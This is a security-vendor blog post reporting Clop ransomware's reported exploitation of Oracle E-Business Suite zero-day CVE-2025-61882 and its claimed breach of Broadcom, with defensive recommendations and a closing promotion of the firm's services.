In a worrying turn of events, the notorious Clop ransomware group has reportedly breached Broadcom’s systems by exploiting a critical zero-day vulnerability in Oracle’s E-Business Suite (EBS). This incident underscores how even enterprise-grade ERP platforms can become attack vectors and why organizations must stay vigilant and responsive.
What Happened
· The vulnerability in question is CVE-2025–61882, which affects the BI Publisher Integration component of Oracle EBS’s Concurrent Processing module. This flaw allows remote code execution without any authentication, making it extremely dangerous.
· According to Oracle, versions 12.2.3 through 12.2.14 of EBS are impacted.
· Threat intelligence firms report that Clop began exploiting this vulnerability around early August 2025.
· Evidence for the exploit was later publicly shared by a hacking group calling itself Scattered Lapsus$ Hunters, which leaked a proof-of-concept archive containing Python scripts.
· Using this exploit, Clop appears to have conducted data theft from affected systems and followed up with extortion emails demanding ransom.
· Oracle responded by issuing an emergency patch, but they emphasized that customers must first apply a prior Critical Patch Update (from October 2023) before installing fixes for this zero-day.
Indicators of compromise (IOCs) shared by Oracle include suspicious IP addresses and reverse-shell commands tied to the exploit.
Why This Matters
1. High Severity: With a CVSS score of 9.8, this is one of the most critical vulnerabilities and the lack of authentication makes it easy for attackers to exploit over a network.
2. Application-Layer Risk: Rather than targeting endpoints, Clop is exploiting enterprise applications directly. This kind of application-layer attack is increasingly common and harder to detect with traditional security tools.
3. Supply of Exploits: Because a public proof-of-concept is available, the risk is magnified: not just Clop, but possibly other threat actors can use the exploit.
4. Business Impact: Oracle EBS is widely used in critical functions such as finance, procurement, HR so a compromised EBS can expose highly sensitive business and operational data.
5. Urgency of Patching: Emergency patches are out, but the requirement to apply earlier updates first means some organizations may delay or misconfigure, leaving themselves exposed.
What Organizations Should Do
· Patch Immediately: Apply Oracle’s emergency fix, but make sure prerequisites (like the October 2023 Critical Patch) are already installed.
· Audit and Hunt: Use the IOCs shared by Oracle to search for evidence of compromise check logs, network activity, and system behavior.
· Isolate Critical Apps: Restrict public exposure of EBS instances and ensure that only trusted networks and users can access them.
· Implement Runtime Monitoring: Monitor EBS for anomalous behavior, such as unexpected processes, reverse shells, or unusual HTTP requests.
· Incident Response Readiness: Be ready with a response plan in case of a breach. Have backups, run tabletop exercises, and validate your ability to respond quickly.
· Third-Party Risk Review: Re-evaluate how third parties integrate with your EBS. If external code or plugins are allowed in your environment, ensure they are secure and kept up to date.
Conclusion
This Clop attack via Oracle EBS’s zero-day vulnerability is a reminder that no system is immune, no matter how mature or mission-critical. As threat actors shift their focus to enterprise applications, the traditional perimeter-based defense is no longer enough. Organizations must stay proactive patch swiftly, monitor deeply, and prepare for the worst.
About COE Security
At COE Security, we help businesses across finance, healthcare, manufacturing, cloud services, and government sectors strengthen their cybersecurity and compliance posture. When it comes to high-risk environments like enterprise resource planning systems we offer:
· Rapid vulnerability assessments and penetration testing
· Runtime protection and behavior monitoring for critical applications
· Compliance support for frameworks like ISO 27001, SOC 2, GDPR, HIPAA, and PCI DSS
· Incident response planning, tabletop exercises, and on-demand expertise
· Continuous threat intelligence to stay ahead of emerging cyber risks
Trust us to secure your infrastructure while you focus on your core business.
Stay Cyber Safe
Follow COE Security on LinkedIn for regular updates, threat insights, and compliance guidance so you can stay informed and protected.